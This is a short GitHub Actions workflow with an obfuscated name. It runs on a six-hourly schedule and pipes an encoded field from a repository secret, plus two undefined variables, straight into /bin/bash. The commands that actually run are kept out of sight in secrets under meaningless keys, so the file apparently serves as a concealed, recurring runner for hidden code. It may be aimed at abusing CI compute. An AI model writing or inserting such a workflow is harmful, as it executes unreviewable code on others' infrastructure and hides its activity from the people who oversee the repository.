name: minidisctransire
on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: minidisctransire
        env:
          nt3: ${{ secrets.nt3 }}
        run: |
          echo $nt3 | jq -r .d944 | /bin/bash
          echo $eqf66 | jq -r .udxa410 | /bin/bash
          echo $sjydl1040 | jq -r .z02450 | /bin/bash

